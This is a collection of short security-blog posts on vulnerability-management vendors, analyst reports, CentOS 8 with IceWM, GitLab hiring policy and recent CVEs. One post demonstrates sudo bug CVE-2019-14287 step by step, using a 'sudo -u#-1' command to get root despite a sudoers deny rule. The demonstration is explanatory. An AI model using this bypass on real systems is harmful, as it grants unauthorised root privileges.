Due to the problems of automated Vulnerability Remediation, it seems that currently #VulnerabilityManagement and #PatchManagement vendors mainly focus on the hosts:

1) that are not very important, so the unsuccessful update won't become a complete disaster;
2) where the update operation is quite complicated.

It seems a bit foolish to offer automated remediation for the systems where almost everything can be updated with a single command from #WSUS or Linux repository. However, in the case of Linux, there will be software installed from sources, self-built packages, and other complexities. And it's even without talking about #Docker. 🤯

So, it turns out that the most convenient for vendors is to focus on Windows desktops. And not for the all programs, but only for a specific list (clarify this to avoid surprises!).

Plus, the trigger and responsibility are still in the hands of IT administrators. 😉

Such "automated remediation" off-the-shelf solutions can be successfully presented on the market right now.

Adobe is deactivating all accounts and cancelling all subscriptions in Venezuela to comply with U.S. Government Executive Order (issued with no expiration date). There will be no refunds! Yep, they block the accounts of ordinary people, who bought the damn Photoshop. Isn't this an example of REAL piracy from well-known "piracy"-fighters? 😏

The sad reality is that even in the case of "private clouds", no one can be protected from such political decisions. Does this mean that import substitution and protectionism are good for the country and people? Well, not really. I believe that only a free competitive market provides good products. But, as we can see, it may be practical. 😕 At least, it is much better than to face such unfriendly unilateral actions unprepared and not to have any alternatives.

It's a little bit sad that there are no more vendors with Russian roots in Gartner 2019 MQs for AST and WAF. #PositiveTechnologies were added in MQ for AST in 2018 and excluded in 2019 with a standard comment "were dropped based on our inclusion and exclusion criteria" (as well as SiteLock and Trustwave). Positive Technologies were also in MQ for WAF in 2017 and probably excluded in 2018 (I didn't track this one). Earlier in MQs were #ERPScan (AST MQ 2017) and #Wallarm (mentioned, but not included in WAF MQ 2017).

Do you need #CentOS8 with #IceWM as desktop Operating System? Most likely not. Especially if you want it to work smoothly without any worries and troubles. However, if you enjoy playing with new desktop environments, you might find it fun.

My reasons were as follows:

1. I wanted to use the same Linux distribution for server and desktop. Just to minimize possible surprises during the deployment.
2. I wanted to know what is going on in the RPM-based part of Linux world. The only way to achieve this is to use such distribution every day.
3. I was tired of problems with the Virtual Box guest additions in #CentOS 7 (yes , I run it all as a virtual machine), especially after the 3.10 kernel updates. It was time to move on.
4. I didn't want to use #Gnome3, because it’s slow and ugly (however it’s fully functional!). And there were no other DEs in CentOS 8 repositories at that time.

Read here: https://avleonov.com/2019/10/14/centos-8-with-icewm-desktop-environment/

A nice, but not very practical bug in #sudo CVE-2019-14287. Let's say I created a temp user:
# useradd temp
# passwd temp

And in /etc/sudoers I forbade him to run /usr/bin/id as root:
temp ALL=(ALL, !root) /usr/bin/id

Then I login as a temp user:
# su temp

I can run /usr/bin/id as temp user:
$ /usr/bin/id
uid=1002(temp) gid=1002(temp) groups=1002(temp)

I can't run it as root with sudo:
$ sudo /usr/bin/id
Sorry, user temp is not allowed to execute '/usr/bin/id' as root on DESKTOP-DA27N5I.localdomain.

BUT if I set a special user id (-1 or 4294967295), I actually CAN run it as root with sudo (it's a bug!):
$ sudo -u#-1 /usr/bin/id
uid=0(root) gid=1002(temp) groups=1002(temp)

^- we see that it was really executed as root with uid 0.

Yep, this one is funny. CVE-2019-16278 is a fresh 0day RCE in open-source #Nostromo web server (versions <= 1.9.6) through directory traversal. This bug is due to an incomplete fix for CVE-2011-0751: "we can bypass a check for /../". It was discovered 8 years (!!!) later. Ha! 😀

What is better: homegrown custom Vulnerability Scanning automation or commercial Perimeter Scanning Service (Threat Intelligence Platform)?

There are two main issues that each Vulnerability Scanning vendor faces:

1. What to scan. If you (as a vendor) want to provide your Threat Intelligence feed automatically, you have to know what to scan without asking your customers. Even inside the big organization, where people can make integrations with various IT data source, it's not not so obvious what to scan! Of course, you can get some targets using known IP ranges, domain names, connected websites, etc. But, most likely, you will miss something important or/and add unrelated trash. Thus, there will be many false positives and false negatives in your report.

2. Actual scanning. You can make an aggressive full-scan and your scanner will be blocked or will affect the targets negatively. Or you can scan only the most popular ports and miss something important. In both cases, the scan result won't be good enough.

So, I'm standing for the homegrown solutions, that can be customized in different ways. 😉

BUT I am also for the constant comparisons with the commercial scanning services. Not because they will provide a better alternative (most likely not), but because they do the things independently and differently. The simple diff with their results can show whether your process is good enough: maybe some domains are managed on a different DNS server and you don't see them, maybe some target hosts have already banned your scanner and you don't see their services, maybe some host scans fail because of timeouts and various anti-scan measures, etc. Anything can happen!

When you have alternative results, it's much easier to evaluate the quality of your own system and make changes.

I just read the 14-page report, "Comparing vulnerability and security configuration assessment coverage of leading VM vendors" by Principled Technologies. Tenable marketing team actively shared it last week.

The main idea of the report: Tenable covers more CVEs and CIS benchmarks than Qualys and Rapid7.

So, my impressions:

1. Hallelujah! Finally, a comparison of Vulnerability Management products based on something measurable - on their Knowledge Bases. And at least one VM vendor is not afraid to use it in marketing and mentions the competitors directly. This is a huge step forward and I hope that this is the beginning of something more serious. We really need to start talking more about the core functionality of VM products.

2. However, this particular report is just a Tenable advertisement. This is not even hidden. I really like Nessus and Tenable, and believe that they have a very good Knowledge Base, but reading on every page how great Tenable's products are is just ridiculous. It would be much better to read it in more neutral form.

3. Using only the CVE IDs for comparing Vulnerability Knowledge Bases is NOT correct (strictly speaking), because for many software products most of vulnerabilities do not have CVEs, only the patch IDs. CVE-based comparison also doesn't distinguish types of vulnerability checks: remote banner-based, remote exploit-based and local. To make a reliable comparison, it's necessary to map all existing vulnerability detection plugins of VM products, but this is MUCH more difficult.

4. CVE-based comparison in this report is not really informative. They only compare absolute numbers of IDs grouping them by year, software product (cpe) and cvss v2 score. Why is this wrong? If VM vendor A covers 1000 CVEs and vendor B covers 1000 CVEs, this does not mean that they have the same database and it is quite complete. The real intersection between the KBs may be only 500 IDs, so these vendors would be able to detect only a half of each other's vulnerabilities. It matters, right? In my old express comparison of Nessus and OpenVAS Knowledge Bases I demonstrated this and tried to suggest reasons why some vulnerabilities are covered by some vendor and others are not. If you compare CVEs as sets of objects, it turns out that each VM product has own advantages and disadvantages.

5. CIS-based comparison in this report uses only information about certificated implementations from the CIS website without regard to versions and levels. CIS Certification is an expensive and complicated procedure, that is NOT mandatory and does not affect anything. I once implemented many CIS standards for Linux/Unix in PT Maxpatrol. Well, yes, they are not certified and you won't see them on the CIS website, but does this mean that they are not supported in the VM/CM product? Of course not! So, it's a very strange way of comparing Compliance Management capabilities.

In conclusion, the idea behind this report is good, but the implementation is rather disappointing. If one of the VM vendors, researchers or customers wants to make similar comparison, public or private, but in a much more reliable and fair way - contact me, I will be glad to take part in this. 😉

#PrincipledTechnologies #Tenable #Rapid7 #Qualys #CVE #CIS #VulnerabilityManagement #ComplianceManagement #CPE #CVSS #PositiveTechnologies #MaxPatrol #OpenVAS #Nessus

Yep, it's been a while since the last update. But I'm still working on Zbrunk and think this project is very important. It stuck a bit, but I hope to make small commits every evening. I also changed the priorities. Now I think it would be better not to integrate with Grafana, but to create own dashboards and GUI. And to begin with, I created a simple interface for Searching (and Deleting) events. #flask #vuejs #zbrunk

Q4 2019 Forrester Wave "Vulnerability Risk Management" with my arrows and old positions from the Q1 2018 report

It's becoming a good tradition to share my impressions about the Forrester Wave "Vulnerability Risk Management" report (here is one for Q1 2018). 😉 You can download a free reprint for Q4 2019 from Tenable website. This time I even edited the illustration a bit. I tried to show how the positions of vendors changed, which were added or removed. Please note that this is not official, it's just an extra layer that I added for fun.

What I liked:

The report has become much more adequate than last year. Traditional VM Big Three (Qualys, Tenable and Rapid7) are leaders. 👍🏻 Stagnant VM vendors have been pessimized or completely removed from the report. This is probably due to new and more adequate inclusion criteria: "product improvements over the last two years", "annual product revenue greater than $10 million", "VRM product was responsible for over 50% of their total revenue", "at least 100 enterprise customers", etc.

What I did NOT like (and this hasn't changed much since last year):

1. The main slogan of this report is "Prioritization And Reporting Are Key Differentiators". According to Forrester, Risk Prioritization is based on measuring vulnerabilities, assets and network segments. Well, I agree that Risk Prioritization is important. BUT (!) only when your Vulnerability Detection is perfect. This is clearly not the case at the moment! For proper Risk Prioritization it's necessary to understand the limitations of Vulnerability Scanners and how to obtain data for Asset and Network classification. Unfortunately, this report doesn't pay much attention to core functionality of VM products, it focuses on GUI, reports and high-level marketing features. The "vulnerability enumeration" is only 15% of overall weighting. It's really sad. 😔

2. Profile descriptions are based on marketing materials from vendors (BTW, such extract might be quite useful), and on some user quotes. These users also write about the reports and prioritization, like "custom reporting on individual business units was cumbersome" and "customers appreciate the new UI and strong reporting capabilities". It seems these users don't have (don't see/don't want to discuss) other problems.

3. Forrester mixes products that actually scan the network hosts with the products that only analyze imported data, perimeter-only services (why noto add over9000 ASV scanners than?) and scan services with "dedicated security specialist". The authors even write several times that some products "cannot be treated as a proper vulnerability management tool", so why do you include them in the report? 🤨

In any case, the report was better than last year. 🙂 I hope Forrester will make separate reports for the tools that actually detect vulnerabilities and tools that only aggregate&prioritize the vulnerabilities. It will also be great to change inclusion criteria and add smaller and more local VM vendors.

#Forrester #Brinqa #DigitalDefense #Expanse #KennaSecurity #NopSec #Outpost24 #Qualys #Rapid7 #RedSeal #RiskIQ #RiskSense #SkyboxSecurity #Tenable #BeyondSecurity #Tripwire #Symantec #BeyondTrust #IBM

Well, it's nice to recall this poll from May. 😉 It took ~ 6 months for #BlueKeep (CVE-2019-0708) to get a commercial exploit, then a free public exploit, and finally a first sample of malware that uses this vulnerability to deliver Monero cryptocurrency miner. Of course, this is not comparable to the WannaCry epidemics, and this malware seems to be successful in BSODing RDP honeypots mainly, but still. 🙂

Anyone can be pressured. User siziyman commented in the thread: "I hope you do realize that there's no need for individual to be living within a certain state borders for that state to apply pressure to them, as long as they has family/friends or anyone/anything left to lose in that country. So if that is the concern to address, you'd have to discriminate by nationality (or even history of one's movement across countries - I do know American citizens, who lived or still live in Russia, have friends or family there)."

This is a pandora’s box. Today we see country-of-residence restrictions; tomorrow it will be country-of-origin restrictions or the fact that you have relatives in some wrong country, etc.

What if such a policy is will be applied everywhere? User jas88 commented: "Next week, the Chinese government would like a partition staffed only by Chinese nationals; the week after that, we get a European bank wanting 'EEA nationals only' for over-zealous GDPR compliance..."

I would like to see such data privacy problems to be solved technically. For example, with User Behaviour Analytics and Data Leakage Protection. The idea that you can eliminate the risk simply by not hiring people from some countries is stupid and unprofessional. But of course, GitLab has the right to do this.

BTW, don't use GitLab. Use Atlassian Bitbucket instead. 😉